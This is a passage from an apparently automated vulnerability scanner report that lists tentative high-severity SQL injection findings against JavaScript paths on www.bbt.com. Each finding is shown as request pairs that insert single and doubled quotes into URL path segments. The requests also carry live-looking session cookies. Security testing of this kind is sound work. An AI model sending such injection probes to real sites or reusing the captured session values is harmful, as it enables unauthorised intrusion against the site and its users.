Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:11:45 GMT
location: http://www.bbt.com/bbt/%27%27/includes/javascript/browserDetect.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 165
cache-control: private
x-powered-by: ASP.NET
Content-Length: 169

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/browserDetect.js">here</a>.</body>

1.63. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/browserDetect.js

Issue detail

Request 1

GET /bbt/includes'/javascript/browserDetect.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:12:00 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes''/javascript/browserDetect.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:00 GMT
location: http://www.bbt.com/bbt/includes%27%27/javascript/browserDetect.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 164
cache-control: private
x-powered-by: ASP.NET
Content-Length: 168

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/browserDetect.js">here</a>.</body>

1.64. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/browserDetect.js

Issue detail

Request 1

GET /bbt/includes/javascript'/browserDetect.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

Request 2

GET /bbt/includes/javascript''/browserDetect.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:19 GMT
location: http://www.bbt.com/bbt/includes/javascript%27%27/browserDetect.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 164
cache-control: private
x-powered-by: ASP.NET
Content-Length: 168

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/browserDetect.js">here</a>.</body>

1.65. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/browserDetect.js

Issue detail

Request 1

GET /bbt/includes/javascript/browserDetect.js' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:12:41 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript/browserDetect.js'' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:12:41 GMT
location: http://www.bbt.com/bbt/includes/javascript/browserDetect.js%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 164
cache-control: private
x-powered-by: ASP.NET
Content-Length: 168

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/browserDetect.js%27%27">here</a>.</body>

1.66. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/new_window.js

Issue detail

Request 1

GET /bbt'/includes/javascript/new_window.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:13:45 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/includes/javascript/new_window.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:13:45 GMT
location: http://www.bbt.com/bbt/%27%27/includes/javascript/new_window.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 162
cache-control: private
x-powered-by: ASP.NET
Content-Length: 166

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/new_window.js">here</a>.</body>

1.67. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/new_window.js

Issue detail

Request 1

GET /bbt/includes'/javascript/new_window.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:13:50 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes''/javascript/new_window.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:13:50 GMT
location: http://www.bbt.com/bbt/includes%27%27/javascript/new_window.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 161
cache-control: private
x-powered-by: ASP.NET
Content-Length: 165

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/new_window.js">here</a>.</body>

1.68. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/new_window.js

Issue detail

Request 1

GET /bbt/includes/javascript'/new_window.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:13:54 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript''/new_window.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:13:54 GMT
location: http://www.bbt.com/bbt/includes/javascript%27%27/new_window.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 161
cache-control: private
x-powered-by: ASP.NET
Content-Length: 165

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/new_window.js">here</a>.</body>

1.69. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/new_window.js

Issue detail

Request 1

GET /bbt/includes/javascript/new_window.js' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:13:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript/new_window.js'' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:13:59 GMT
location: http://www.bbt.com/bbt/includes/javascript/new_window.js%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 161
cache-control: private
x-powered-by: ASP.NET
Content-Length: 165

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/new_window.js%27%27">here</a>.</body>

1.70. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/swapimage.js

Issue detail

Request 1

GET /bbt'/includes/javascript/swapimage.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:13:52 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/includes/javascript/swapimage.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:13:52 GMT
location: http://www.bbt.com/bbt/%27%27/includes/javascript/swapimage.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 161
cache-control: private
x-powered-by: ASP.NET
Content-Length: 165

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/includes/javascript/swapimage.js">here</a>.</body>

1.71. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/swapimage.js

Issue detail

Request 1

GET /bbt/includes'/javascript/swapimage.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:13:56 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes''/javascript/swapimage.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
